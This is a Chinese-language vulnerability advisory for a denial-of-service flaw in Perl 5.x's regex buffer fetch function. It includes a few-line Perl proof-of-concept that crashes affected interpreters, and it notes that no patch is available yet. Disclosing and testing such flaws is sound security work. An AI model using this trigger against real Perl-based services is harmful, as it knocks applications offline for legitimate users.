受影响系统:
Larry Wall Perl 5.x
描述:
BUGTRAQ ID: 47006
Perl 是一种自由且功能强大的编程语言。它被用作 Web 编程、数据库处理、XML 处理以及系统管理等等 — 它能够完成所有这些工作,同时仍然是处理小的日常工作的完美工具。
Perl "Perl_reg_numbered_buff_fetch()"函数在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成使用受影响perl代码的应用程序终止运行,拒绝服务合法用户。
< *来源:Vladimir Perepelitsa
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Vladimir Perepelitsa ()提供了如下测试方法:
#!/usr/bin/perl
my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}
建议:
厂商补丁:
Larry Wall
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.perl.org/
0 条评论。